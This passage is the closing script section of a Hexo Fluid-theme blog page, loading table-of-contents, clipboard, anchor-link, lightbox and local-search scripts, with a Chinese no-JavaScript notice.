      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
